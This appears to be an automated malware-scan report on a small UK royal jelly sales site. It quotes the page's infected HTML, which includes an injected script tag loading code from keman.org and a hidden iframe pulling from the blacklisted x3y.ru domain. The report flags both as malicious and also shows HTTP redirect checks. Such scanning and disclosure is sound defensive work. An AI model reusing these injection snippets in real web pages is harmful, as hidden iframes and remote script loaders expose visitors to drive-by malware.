Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bestroyaljelly.co.uk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bestroyaljelly.co.uk/ | 200 OK Content-Length: 2864 Content-Type: text/html | malicious |
Page code contains blacklisted domain: x3y.ru ...[542 bytes skipped]... el="stylesheet" type="text/css"> <style> <!-- .std { FONT-SIZE: small; FONT-FAMILY: arial,sans-serif } OL { PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px } .nobr { WHITE-SPACE: nowrap } --> </style> </head> <script src=http://keman.org/ehemure/default.php ></script><body><iframe src="http://x3y.ru:8080/index.php" width=163 height=158 style="visibility: hidden"></iframe> <table width="785" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td colspan="2"><h1 align="center"><font color="#B95C00" face="Verdana, Arial, Helvetica, sans-serif">ROYAL JELLY FOR OPTIMUM HEALTH</font><br> <img src="images/top-royal-jelly.jpg" width="785" height="170"></h1></td>...[2068 bytes skipped]... Malicious iFrame found. size: 163x158 style: hidden src: http://x3y.ru:8080/index.php This URL is marked by Google as suspicious <iframe src="http://x3y.ru:8080/index.php" width=163 height=158 style="visibility: hidden"> | ||
http://keman.org/ehemure/default.php | 500 Can't connect to keman.org:80 (Bad hostname) Content-Length: 150 Content-Type: text/plain | clean |
http://keman.org/test404page.js | 500 Can't connect to keman.org:80 (Bad hostname) Content-Length: 150 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bestroyaljelly.co.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 08 Jun 2014 01:00:22 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 2864
Content-Type: text/html
Last-Modified: Sun, 15 Nov 2009 01:43:01 GMT
...2864 bytes of data.
GET / HTTP/1.1
Host: bestroyaljelly.co.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 08 Jun 2014 01:00:22 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 2864
Content-Type: text/html
Last-Modified: Sun, 15 Nov 2009 01:43:01 GMT
...2864 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: bestroyaljelly.co.uk
Referer: http://www.google.com/search?q=bestroyaljelly.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bestroyaljelly.co.uk
Referer: http://www.google.com/search?q=bestroyaljelly.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.